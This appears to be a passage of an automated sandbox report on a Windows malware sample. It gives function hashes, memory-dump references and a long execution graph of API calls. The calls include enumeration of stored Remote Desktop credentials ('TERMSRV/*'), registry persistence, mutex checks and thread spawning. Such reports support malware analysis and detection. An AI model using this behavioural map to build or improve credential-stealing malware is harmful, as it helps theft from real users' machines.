                                                • Opcode Fuzzy Hash: 120aac01b1d19bf89567df46df9f15ac37a0c958acc84ce813f69d2bc8fe1057
                                                • Instruction Fuzzy Hash: E811A170602101EFDB106F68EE8E7C93FB1BB84385F01C436E111A92E2E7B9CC918A4D
                                                Function 0040CCDA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CD19
                                                • CredFree.ADVAPI32(00000000), ref: 0040CD60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Cred$EnumerateFree
                                                • String ID: TERMSRV/*
                                                • API String ID: 3403564193-275249402
                                                • Opcode ID: 0dc0858338212ed792853415e734f338c9895230edc29e12f803d11a40f407cf
                                                • Instruction ID: 46919d1b78b4c4f98928751ff711c86717132dd267c8420e9221b8d9fce6a23c
                                                • Opcode Fuzzy Hash: 0dc0858338212ed792853415e734f338c9895230edc29e12f803d11a40f407cf
                                                • Instruction Fuzzy Hash: 91112731804204EBDF319F94C9887DABBB4AF05705F14827BA501721E0C379AF85DB89

                                                Non-executed Functions

                                                Function 0019F91C Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2305246544.0000000000198000.00000004.00000010.00020000.00000000.sdmp, Offset: 00198000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_198000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b5445beca90ee569798089d0d7018d29cce4fce22433cfcfbce372238ad2ec6
                                                • Instruction ID: e51ce522a023acdf34c7b6de1136991aab78b3978f78d66ed21dc44c61298d8c
                                                • Opcode Fuzzy Hash: 3b5445beca90ee569798089d0d7018d29cce4fce22433cfcfbce372238ad2ec6
                                                • Instruction Fuzzy Hash: 79C04C7689E3C18ED75357744C240543FB55D4751976A51DFC091CF4E3C51A140BDB13

                                                Execution Graph

                                                Execution Coverage:3.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:11.4%
                                                Total number of Nodes:1181
                                                Total number of Limit Nodes:2
                                                execution_graph 7759 4127dc ??1type_info@@UAE 7760 4127f1 7759->7760 7761 4127eb 7759->7761 7763 4127a4 free 7761->7763 7763->7760 5076 4128af __set_app_type __p__fmode __p__commode 5077 41291e 5076->5077 5078 412932 5077->5078 5079 412926 __setusermatherr 5077->5079 5088 412a26 _controlfp 5078->5088 5079->5078 5081 412937 _initterm __getmainargs _initterm 5082 41298b GetStartupInfoA 5081->5082 5084 4129bf GetModuleHandleA 5082->5084 5089 40845a 5084->5089 5088->5081 5309 408f23 5089->5309 5091 40846f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5315 411550 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 5091->5315 5093 40849c 5329 409671 5093->5329 5095 4084ac 5349 401ad8 5095->5349 5098 408548 5354 401289 5098->5354 5099 4084e9 ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH 5100 401289 6 API calls 5099->5100 5102 408507 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@ ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5100->5102 5104 408f1c exit _XcptFilter 5102->5104 5103 408551 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5105 401289 6 API calls 5103->5105 5106 408571 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5105->5106 5107 401289 6 API calls 5106->5107 5108 4085ba ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 5107->5108 5109 401289 6 API calls 5108->5109 5110 4085d6 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 5109->5110 5111 4085f0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5110->5111 5112 408639 OpenMutexA 5110->5112 5115 40a825 3 API calls 5111->5115 5113 408654 WaitForSingleObject CloseHandle 5112->5113 5114 408669 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5112->5114 5113->5114 5358 40a825 RegOpenKeyExA 5114->5358 5117 40860f 5115->5117 5117->5112 5119 408616 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5117->5119 5118 408685 5121 4086a4 5118->5121 5122 40868c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5118->5122 5361 40acb8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5119->5361 5125 401289 6 API calls 5121->5125 5124 40acb8 17 API calls 5122->5124 5123 40862e 5368 409d77 CreateMutexA GetModuleFileNameW ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5123->5368 5124->5121 5127 4086b0 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ CreateMutexA GetLastError 5125->5127 5129 4086e6 5127->5129 5130 4086de ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5127->5130 5405 409008 LoadLibraryA GetProcAddress 5129->5405 5130->5104 5133 4086eb 5410 401000 5133->5410 5139 408724 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5140 408744 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 5139->5140 5142 408764 5140->5142 5143 4087b5 5142->5143 5144 401289 6 API calls 5142->5144 5145 401289 6 API calls 5143->5145 5147 408779 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5144->5147 5146 4087e4 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5145->5146 5148 4087f0 5146->5148 5149 4087f5 5146->5149 5147->5143 5150 408785 5147->5150 5478 409619 CreateProcessA CloseHandle CloseHandle 5148->5478 5152 401289 6 API calls 5149->5152 5150->5143 5154 408795 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 5150->5154 5155 4087b7 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5150->5155 5153 4087fe 5152->5153 5479 4113e6 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??2@YAPAXI ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 5153->5479 5154->5143 5157 4087b0 5154->5157 5462 40a7dc RegOpenKeyExA 5155->5462 5454 403132 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5157->5454 5159 408808 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5162 401289 6 API calls 5159->5162 5163 408828 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5162->5163 5165 401289 6 API calls 5163->5165 5166 408843 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5165->5166 5167 401289 6 API calls 5166->5167 5168 40885e ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5167->5168 5169 401289 6 API calls 5168->5169 5170 408879 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5169->5170 5171 401289 6 API calls 5170->5171 5172 408894 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5171->5172 5173 401289 6 API calls 5172->5173 5174 4088af ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5173->5174 5175 40894f 5174->5175 5176 4088bf 5174->5176 5177 408ad3 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5175->5177 5179 408a03 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 5175->5179 5180 408969 5175->5180 5178 401289 6 API calls 5176->5178 5575 40a9ef RegOpenKeyExA 5177->5575 5181 4088c8 5178->5181 5184 408a10 8 API calls 5179->5184 5183 401289 6 API calls 5180->5183 5185 4113e6 7 API calls 5181->5185 5187 408972 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5183->5187 5529 40ac55 5184->5529 5189 4088d2 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ wcslen ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5185->5189 5186 408b29 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 5190 408b3e 5186->5190 5191 401289 6 API calls 5187->5191 5189->5175 5193 4088f3 5189->5193 5194 401289 6 API calls 5190->5194 5195 408989 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5191->5195 5192 408a7f 5535 4127a4 free 5192->5535 5197 401289 6 API calls 5193->5197 5198 408b47 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 5194->5198 5199 401289 6 API calls 5195->5199 5201 4088fc 5197->5201 5205 408b66 5198->5205 5202 4089a0 5199->5202 5200 408a87 5203 401289 6 API calls 5200->5203 5204 4113e6 7 API calls 5201->5204 5209 4113e6 7 API calls 5202->5209 5210 408a98 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 5203->5210 5211 408906 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5204->5211 5206 408b81 5205->5206 5578 412670 AllocConsole GetConsoleWindow 5205->5578 5208 401289 6 API calls 5206->5208 5213 408b8a ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@ 5208->5213 5214 4089aa ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5209->5214 5210->5190 5215 408aa9 5210->5215 5216 401289 6 API calls 5211->5216 5212 408b74 CreateThread 5212->5206 6373 412442 GetModuleFileNameA 5212->6373 5217 401289 6 API calls 5213->5217 5218 401289 6 API calls 5214->5218 5219 401289 6 API calls 5215->5219 5220 40891a ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5216->5220 5222 408bb4 5217->5222 5223 4089be 5218->5223 5224 408ab2 5219->5224 5482 408137 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@ 5220->5482 5227 4113e6 7 API calls 5222->5227 5228 4113e6 7 API calls 5223->5228 5536 4112fa ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5224->5536 5226 40892e ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5226->5175 5231 408bbe ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5227->5231 5229 4089c8 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5228->5229 5232 401289 6 API calls 5229->5232 5230 408abe 5539 4090db GetModuleFileNameW ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 5230->5539 5234 408c33 5231->5234 5235 408bda 5231->5235 5236 4089dc ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5232->5236 5238 401289 6 API calls 5234->5238 5239 401289 6 API calls 5235->5239 5496 4072e6 wcslen 5236->5496 5241 408c3c 5238->5241 5242 408be3 5239->5242 5244 4113e6 7 API calls 5241->5244 5245 4113e6 7 API calls 5242->5245 5246 408c46 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5244->5246 5247 408bed ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5245->5247 5248 401289 6 API calls 5246->5248 5249 401289 6 API calls 5247->5249 5250 408c5a ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5248->5250 5251 408c01 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5249->5251 5253 408137 37 API calls 5250->5253 5252 408137 37 API calls 5251->5252 5254 408c15 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5252->5254 5255 408c6e ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5253->5255 5256 408ce7 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5254->5256 5257 401289 6 API calls 5255->5257 5258 401289 6 API calls 5256->5258 5259 408c98 5257->5259 5260 408cf6 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 5258->5260 5261 4113e6 7 API calls 5259->5261 5262 408d42 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 5260->5262 5263 408d24 5260->5263 5264 408ca2 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5261->5264 5584 4044ed ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ 5262->5584 5265 408d27 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 5263->5265 5266 408d40 5263->5266 5264->5256 5581 4045a0 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ 5265->5581 5269 401289 6 API calls 5266->5269 5270 408d64 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5269->5270 5271 408d71 ??2@YAPAXI 5270->5271 5272 408da6 5270->5272 5273 401289 6 API calls 5271->5273 5274 401289 6 API calls 5272->5274 5276 408d87 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ CreateThread 5273->5276 5275 408daf ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5274->5275 5277 408df2 5275->5277 5278 408dbc ??2@YAPAXI 5275->5278 5276->5272 6379 40fc69 218 API calls __EH_prolog 5276->6379 5280 401289 6 API calls 5277->5280 5279 401289 6 API calls 5278->5279 5281 408dd3 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ CreateThread 5279->5281 5282 408dfb ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5280->5282 5281->5277 6306 40fc69 5281->6306 5283 408e62 5282->5283 5284 408e08 5282->5284 5286 401289 6 API calls 5283->5286 5285 401289 6 API calls 5284->5285 5288 408e18 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5285->5288 5287 408e6b ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5286->5287 5289 408eae 5287->5289 5290 408e78 5287->5290 5291 401289 6 API calls 5288->5291 5608 410dfa 5289->5608 5292 401289 6 API calls 5290->5292 5294 408e2a ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5291->5294 5295 408e81 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 5292->5295 5594 4080e4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5294->5594 5298 401289 6 API calls 5295->5298 5296 408eb9 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5299 408ed8 5296->5299 5301 408e9b ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5298->5301 5302 408ee3 CreateThread 5299->5302 5303 408eef 5299->5303 5300 408e3e ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE CreateThread 5300->5283 6331 401814 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ CreateDirectoryW 5300->6331 5599 406df2 5301->5599 5302->5303 6334 409b4e GetCurrentProcessId ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5302->6334 5304 408f03 5303->5304 5305 408ef7 CreateThread 5303->5305 5610 40bb79 5304->5610 5305->5304 6359 409fa1 ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 5305->6359 5676 40937b FindResourceA LoadResource LockResource SizeofResource 5309->5676 5311 408f3c malloc ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE malloc 5312 408fcb 5311->5312 5677 402fc1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5312->5677 5314 408fe0 free ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5314->5091 5682 40427d 5315->5682 5317 411571 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5318 411584 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I 5317->5318 5328 4115e9 5317->5328 5319 4115eb ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5318->5319 5320 41159d ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5318->5320 5323 412174 6 API calls 5319->5323 5683 412174 5320->5683 5323->5328 5325 401ad8 2 API calls 5327 41162e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5325->5327 5327->5093 5687 41212c 5328->5687 5330 409684 5329->5330 5348 4096be 5329->5348 5331 409698 5330->5331 5332 4096d3 5330->5332 5771 4097c8 5331->5771 5333 409725 5332->5333 5341 4096e7 5332->5341 5336 401b07 2 API calls 5333->5336 5337 409732 5336->5337 5339 40439c free 5337->5339 5338 401b07 2 API calls 5338->5348 5340 409746 5339->5340 5342 401b51 ??2@YAPAXI 5340->5342 5343 4097c8 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 5341->5343 5345 409757 5342->5345 5344 40970d 5343->5344 5346 40979c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5344->5346 5347 40979c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5345->5347 5346->5348 5347->5348 5348->5095 5350 401b07 2 API calls 5349->5350 5351 401ae6 5350->5351 5352 40439c free 5351->5352 5353 401afa 5352->5353 5353->5098 5353->5099 5355 401295 5354->5355 5357 4012a3 5355->5357 5775 4012c8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@ _CxxThrowException 5355->5775 5357->5103 5359 40a87b 5358->5359 5360 40a84e RegQueryValueExA RegCloseKey 5358->5360 5359->5118 5360->5118 5362 4112fa 7 API calls 5361->5362 5363 40acec ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5362->5363 5364 4112fa 7 API calls 5363->5364 5365 40ad04 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5364->5365 5787 40ad45 RegOpenKeyExW 5365->5787 5367 40ad17 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5367->5123 5369 40a9ef 3 API calls 5368->5369 5370 409de8 5369->5370 5371 409df6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 5370->5371 5372 409def exit 5370->5372 5790 411980 CreateFileW 5371->5790 5372->5371 5375 409e20 OpenProcess WaitForSingleObject CloseHandle GetCurrentProcessId ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5795 40ab86 RegCreateKeyA 5375->5795 5376 409e19 exit 5376->5375 5378 409f99 exit 5381 409fa1 ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 5378->5381 5379 409e6a PathFileExistsW 5380 409e7b ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5379->5380 5403 409e5f 5379->5403 5798 4118f7 5380->5798 5384 409fce ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5381->5384 5404 40a053 5381->5404 5383 409f43 ShellExecuteW 5386 409f49 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5383->5386 5385 40a9ef 3 API calls 5384->5385 5389 40a020 5385->5389 5390 40a825 3 API calls 5386->5390 5387 408636 5387->5112 5388 409eb9 GetTempPathW GetTempFileNameW lstrcatW ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5394 4118f7 4 API calls 5388->5394 5395 40a027 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 5389->5395 5396 40a039 ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 5389->5396 5390->5403 5391 40a065 Sleep 5392 40a079 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5391->5392 5393 40a0ab ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5391->5393 5807 407112 5392->5807 5398 40ac55 13 API calls 5393->5398 5394->5403 5395->5396 5396->5387 5396->5404 5398->5404 5399 409f81 Sleep 5399->5403 5400 409f6c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5401 40acb8 17 API calls 5400->5401 5401->5403 5403->5375 5403->5378 5403->5379 5403->5383 5403->5386 5403->5388 5403->5399 5403->5400 5404->5387 5404->5391 5406 409035 GetModuleHandleA GetProcAddress 5405->5406 5407 409049 LoadLibraryA GetProcAddress 5405->5407 5406->5407 5408 409066 GetModuleHandleA GetProcAddress 5407->5408 5409 40907a 10 API calls 5407->5409 5408->5409 5409->5133 5411 401289 6 API calls 5410->5411 5412 401011 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5411->5412 5413 401020 5412->5413 5422 40102f 5412->5422 5833 4010f1 GetModuleHandleA 5413->5833 5415 401289 6 API calls 5417 401039 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5415->5417 5416 401025 5416->5422 5834 401234 5416->5834 5418 401054 5417->5418 5423 401045 5417->5423 5419 401289 6 API calls 5418->5419 5421 40105e ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5419->5421 5424 401079 5421->5424 5425 40106a 5421->5425 5422->5415 5423->5418 5426 401234 105 API calls 5423->5426 5428 401289 6 API calls 5424->5428 5845 401178 RegOpenKeyExA 5425->5845 5426->5418 5430 401083 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5428->5430 5429 40106f 5429->5424 5434 401234 105 API calls 5429->5434 5431 40108f 5430->5431 5441 40109e 5430->5441 5846 4011a3 GetPEB 5431->5846 5433 401289 6 API calls 5436 4010a8 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5433->5436 5434->5424 5437 4010c6 5436->5437 5438 4010b6 CreateThread 5436->5438 5440 401289 6 API calls 5437->5440 5438->5437 5933 4011f8 5438->5933 5439 401234 105 API calls 5439->5441 5442 4010cf ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5440->5442 5441->5433 5443 4010eb 